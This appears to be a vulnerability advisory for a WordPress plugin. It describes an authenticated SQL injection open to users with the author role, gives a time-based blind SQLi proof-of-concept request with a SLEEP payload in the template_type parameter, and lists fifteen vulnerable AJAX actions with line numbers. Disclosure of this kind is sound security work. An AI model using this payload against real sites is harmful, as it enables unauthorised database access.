The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.
action={INSERT HERE NAME OF ACTION}&swcm_social_id=socialblockdrag_XpoeK&template_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template_id=2&theme_id=2&securekey=dd041b294f
Action: swcm_social_function ⇒ SQLi at line: 2725
Action: swcm_video_function ⇒ SQLi at line 2510
Action: swcm_footer_function ⇒ SQL at line 2311
Action: swcm_disclaimer_function ⇒ SQLi at line 2537
Action: swcm_image_function ⇒ SQLi at line 2621
Action: swcm_customer_function ⇒ SQLi at line 2940
Action: swcm_delete_widget = SQLi at line 3018
Action: swcm_hr_function = SQLi at line 2423
Action: swcm_maintext_function ⇒ SQLi at line 2339
Action: swcm_multi_image_function ⇒ SQLi at line 2653
Action: swcm_button_function ⇒ SQLi at line 2482
Action: swcm_title_function ⇒ SQLi at line 2596
Action: swcm_clone_widget ⇒ SQLi at line 3087
Action: swcm_order_function ⇒ SQLi at line 2994
Action: swcm_textarea_function ⇒ SQLi at line 2284